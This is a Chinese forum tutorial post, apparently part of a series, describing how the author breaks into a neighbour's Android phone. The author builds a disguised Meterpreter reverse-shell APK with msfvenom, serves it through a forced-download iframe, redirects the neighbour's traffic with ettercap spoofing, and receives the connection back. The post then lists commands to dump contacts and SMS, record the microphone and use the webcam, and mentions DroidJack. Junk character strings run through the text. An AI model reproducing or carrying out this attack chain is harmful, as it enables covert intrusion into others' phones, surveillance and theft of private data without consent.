|
- R4 C& Q% F& Y& V8 v9 A 五、msf+ettercap入侵邻居安卓手机
/ R% q; x; ^" L5 e* L
' F9 z, o, |6 f: D8 J. m2 S* W
6 X7 ~% Q# Z" d+ l+ F 首先启动msf 3 f7 C$ ~% Q6 M9 k& T1 T
* }8 D' X8 ^4 X. x+ V9 {3 r9 T1 x$ N @# c; n
先用kali生成一个安卓木马,如下命令:
) v8 G6 u& W: J( J
& x y# b, B6 A) U# o- _ H- I
; l# I* D) y. o8 } X8 O' S Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
, c( P( h- Y3 W6 m ) j# y. o- r: S, K1 m+ F
& `, V4 s \) z$ `4 w& s& `: E 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
) r6 L5 p/ O+ V ; @1 V- q9 a7 x
8 v1 S8 B9 [ _
然后进入msf + L' {% \. d- A3 w7 g) x
' ~, u' F9 p* @" q0 G% q9 {' e8 M: _. l3 O$ _' O5 q
use exploit/multi/handler P: G! Z1 y* I6 f
9 J+ }. g) I& s# P
# A% d" G* P% S
set payload android/meterpreter/reverse_tcp
" ^/ m4 ^+ C" Q; L: n
3 Z, L: }) Z# z2 J1 q S Y, N! @9 }7 U
set LHOST 192.168.0.109 //ip为kaili的ip 1 c8 G# E% V) f6 F t" m
0 a8 G% f& Y4 M: c+ A
8 N- i/ a2 x7 l2 E; ]9 k4 m" c
set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - I; b" \" N) [( h
/ ]+ q7 `, V& \* J- h3 n
8 y! D" X- F+ [0 W& G, M" j4 y$ S
Exploit
' S" l6 m* H* M
# q+ ?+ x3 c4 _$ L1 O) n
7 G5 l. h. z8 B# \) K
) f& X2 c3 I- M- X" j. x- ?# N! R% t
! ?0 }- M4 W8 Z- J# u. F( l9 {; g/ X1 \" p( i2 M n
下面我们开启ettercap -G : v! ^. V3 J: e$ g& `; O
# o3 J& h! L) Z8 n/ Y! u- }
( J% b0 d) B& q, g" [* d, E 我物理IP为 + E/ P8 K' b% S
$ T4 K- W- I; p5 a0 s
- H; P5 R0 m3 j0 K% e& {. I
+ {1 j- k' X3 K7 ?3 |* Q" g( U ]
$ z( l! Q- v7 ^7 ?' ~
/ y, R7 E% o+ U 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,
0 ]3 e+ ~, v- E- N
, A, y" K9 S/ h; Q9 Z- {( d) L' r W7 Z% G& M1 u3 v- [
下面我们来设置一下 , U- q: w' p4 F3 j5 k% w) ]- z
4 _& I) ?! ` b# }
- D0 ^8 e7 ?8 B
" P, p' H& M/ r $ T8 o! ], e P
/ o; G+ R! ]% \2 ^$ c `
在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, $ a- ]. |/ m) h0 y$ m. }
: l+ p+ j) K. ^+ X( R
4 s N0 W; {# _# A
8 {" q9 d8 O( ]+ D: ?
$ p+ {8 c; R! _' K' j3 ?: c6 ]4 i0 I, t
) Q" D. e" a- R0 F# x; K
8 }8 ]! l. A/ r" J- U2 Q
) v( B! D2 e9 i+ p, N' h' l
& A, |& d& o" V1 H1 U, t3 j2 }1 u; l # M( f& e% [! d, @5 I; I
. l2 V& X# a: w% r
; q) Z4 z ~5 h! |3 J
! x' n$ I) Z; [$ K
& s6 Q# |6 F. f7 \' W1 n P$ }- {
7 o) f9 A$ ~' d6 h+ C7 L9 E 2 ~& r! I. x$ A: {5 h5 w6 z
. S& L0 ^8 ^7 L( R; ]
8 ^, `* }* g: F& \
; q8 T! @5 ~( ^! D0 A
5 A+ ?- f8 j, o 4 W8 v! R* m# h# O
5 l' y4 c P" K: y3 C/ |& Y8 f+ h) E0 [' l" _$ u, `3 H, A
! s' _( K' E8 R; E2 p& H
3 W! V# D/ E; \+ O/ y) g! K3 G) P4 w, w# f: \7 C
+ X2 y" ?! y5 t4 ?2 J+ F" u9 w
- v: |$ I& M" {2 [3 ?9 n$ s7 {- i. h# l- ?, F; U/ O! \/ v0 j( g" v
2 ~; M* p& b' E% V0 @, C; m- y
+ `7 R* {# u* @4 Z+ q) R( i* m; c6 `8 x# j" s
' L3 C! k+ c/ _2 a
6 m( W9 Q! P% H' z
% c5 ^! {, b+ D: [
8 n7 s8 F5 a. G3 P' w9 K 3 I6 l6 r2 m; I
' ]+ ], Z, y h0 j! D! N8 m 2 N/ b* [ \$ [ v. G
J, q! \+ o$ p$ r1 Q2 O& D7 Y! B7 L' j& X$ ^5 T" k
下面我们开始攻击 0 A' j6 q3 u/ J* s
- E$ S, d0 U0 P, P4 J
- r4 k# ~% a3 w- I7 a
' I4 I6 n% E2 l6 O$ `' z7 ?4 m
( b! |& S1 @# r3 @( d" ~
% s- L: C& V1 s6 ?8 {% H4 _ p! { + s; h4 Y' T* A5 n
) N& K0 G& F- v" W4 ]! k0 e, x# ~- ~! c3 J) b/ {' }4 j/ i$ N" V0 |# v
! K" ]+ [% H# B
0 p$ a% ]) }, A" \) t' I* k3 Q( D* [- S3 X0 h& @/ J( X3 |
8 k1 @5 g/ r. D5 c U # z, _8 `4 B4 I; R( u5 u' M0 J' d2 v' s
) Y" Q6 b. R2 Y f3 v' r+ h3 |
9 ^$ r7 B! G7 g0 C" K* O. W7 z5 E
7 S# Q5 I( i) L1 q. d8 D/ P2 K/ h, R0 s
大概过了5分钟多,发现反弹成功了
3 k0 N n1 x- @5 N
' d- v* R* ?& d) W
5 k/ b! U- ~9 T: X9 z( Q- Z
7 j0 v( K7 B7 S" U* H1 F' @' R6 X
7 [& v. `; t3 ~" |4 B% N
% a+ p! D- S* ~' |& B3 m' U
+ Q+ z( b& p' O0 k4 X2 o |/ r, H- m' z
! V& M9 k1 H2 v/ M) x5 L6 k! Q' v* ?2 i# i5 |$ X% J
& c5 Z: V1 x. c
9 O, V t6 y! V- f+ i8 N& g# @' i- i2 {" `
5 M$ L: ?6 h# {* V7 }; \. Q' d, B ; b3 _0 Q9 X' M. p& \. f
- @/ g( g3 P- l* o C
0 q% M# X3 k+ |- o0 y% m ( Z: {8 h0 ]) p( G9 A1 i+ G- A* P
0 a4 l' _8 I- E0 T
2 U! |: k4 i9 `: e + w3 ]5 G& Q6 X' e( u! Z( W
; ?, [1 v- s6 p8 G2 F- k( b( S& w$ |
, J, _: h( E0 I$ e. o ) H" n; s! s7 k1 h
3 h1 @' \) J; E& }- Z, z5 I
执行命令
7 ]8 {, d4 T0 @4 Q3 j ' l8 k+ a8 a* `# p5 c6 b
9 l$ g, H! A( u! ]. t
2 z% S" f" C4 d' Y) Z% g& V* U P) Q X0 u8 Z! }5 e, M
+ K9 R2 T& L7 V; \8 p' R5 R; ? dump_contacts --》这个是导出电话
3 l+ o" i- s* W3 h r6 C; w% n0 ? 4 z4 w) D& P( z$ l" |* ^
W: v/ u, u. q. V
dump_sms --》这个是导出信息
: n, P9 Q* R, Z9 B ; q) ]& O$ E" D- }$ x# g8 D" j
# X" P' ^2 o+ h6 B0 o5 C% ~; r
record_mic Record audio from the default microphone for X seconds
: _' V1 M' ?- h* _) \4 N8 Q/ A
% n3 ^: S3 r7 V4 \* o- V9 }' ^* ?# C" J
webcam_chat Start a video chat
1 g* ^& |+ S( d& Q7 G5 u4 n b ) @6 P6 E) p2 x- I
- w2 F: t t% l$ S, l" J
webcam_list List webcams
+ K/ L( B, u. @2 g " k0 D9 v' ?* g: I& q( u
! y6 O# t" ?2 `! Q$ N webcam_snap Take a snapshot from the specified webcam
' v& i* `! x" x8 D, O- P 4 x) M5 t+ f9 f A' r6 ]% J
- q4 A1 e X; x; O# A6 N9 a webcam_stream   lay a video stream from the specified webcam . k; \( y) s) |# d" E& j' I2 P
: t+ u2 E; R6 R+ x' ~
" b/ {7 _4 M X8 N( B; L ; X7 e- T2 P" f' P8 q) s
; ^0 w% d: ?2 X0 T8 V* j4 J, L& Z3 V7 T; g) r
; V- } L7 i0 `. c 0 s- [( \& l, ~
5 v' c$ K/ J+ q0 H4 Y- X8 l0 w+ P 我们打开看一下电话薄,
$ J' |* @* z! y, l- ^
9 ^& v, [$ i& A, \) Z- Q6 o3 r1 W5 ]& D, @, ~. x1 N
! x) t; N; a- F, F4 ]! H
6 M9 S H; Z- Z/ h- I1 W4 {
8 [; p, v- x$ K1 @3 @ ; @! @% b8 ]0 e% M+ R/ G. P8 e4 Y
0 s8 w' r. m7 P7 z
4 A5 J/ X: C3 Q2 Z # [ M+ `1 M) f' v! s+ b6 o9 r+ ?+ {
9 Y" ^& O0 J) k* i8 U, A6 n0 g
& I2 \0 h" U& Z- b) B. D0 ? & P7 ?4 U. S7 c1 U" l8 `6 d( @
+ I+ t# P8 A+ L, J& T
: V4 Z9 G- X+ a
) k3 h3 ?0 D* ?: { 3 }% E/ e+ ^7 P
, q R L) f9 a# @ 3 D, @ E) R; [4 T0 R# z5 v( \
# B5 y7 W- B) M0 l% h7 q; h+ O
+ Z- z; e j% i$ q/ c8 w( X) Q
我们同时欺骗成DroidJack木马,使用方法如图: 6 s. F+ m1 s) g! u' T
+ L* G+ J% B l4 Y1 \; t# g0 X
8 A' B. n4 s" @
b- M1 `: X* Z$ Q* F7 S
. x1 ]- Y' X+ Y, l5 }# W9 U6 N0 D! _ o
8 h: v" V% W! Z
- C2 x3 k6 D+ Y$ H* n
0 z' e, Y* ?$ } & z% H% T. u' }
" K# d6 ~. x- b3 _, N# R! E
# H" U/ a0 g6 F+ C" `" ^
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 8 K" C- y# @8 U% p# Z1 q K; ~
( F0 q' W; U9 ?9 Z
! b3 k* J- L d8 x
' {6 S2 ]( k) I * { U+ Y- |6 L) O& G; M# F
J' s9 a& G& i7 w' x$ ~ B% t p
+ d+ a% ^7 U2 d8 q8 `# H3 W; p( z3 V
" a9 h5 l- [& T1 p6 y; P4 p
* o, h2 G5 `5 d- f; F/ J" C
7 M1 U; v. j- r) i& ^ 3 T& u& L' ]# Z; m, O1 b! j! y; i
+ P0 t* S0 V7 P  1 }% i+ R: a- c# X, q% N7 s' x
+ {- z/ w9 g$ X9 J+ k/ _$ s2 K) `" H5 [; n/ ~+ W! L8 x0 b
# r8 `$ a5 J- O; s
|